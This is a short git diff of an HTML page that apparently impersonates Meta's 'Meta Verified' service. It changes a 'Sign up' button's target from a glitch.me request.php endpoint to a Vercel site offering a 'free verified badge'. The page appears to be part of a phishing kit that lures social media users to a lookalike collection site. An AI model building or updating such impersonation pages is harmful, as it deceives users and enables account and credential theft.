--- a/index.html
+++ b/index.html
@@ -191,7 +191,7 @@ Meta Verified" text container -->
 Meta Verified</h4>  <img src="https://cdn.glitch.global/284b7fa1-727b-400e-b33b-3ca98ea2cb83/IMGremovebg.png?v=1722283962201" alt="">
             </div>
             </div>
-      <a href="https://maroon-supreme-viola.glitch.me/request.php" class="button">Sign up</a>
+      <a href="https://request-for-free-verified-badge--five.vercel.app/" class="button">Sign up</a>
       <div class="flex justify-center items-center pl-6 px-28">
                         <div class="flex mt-9"></div>
                         <div class="mx-3">
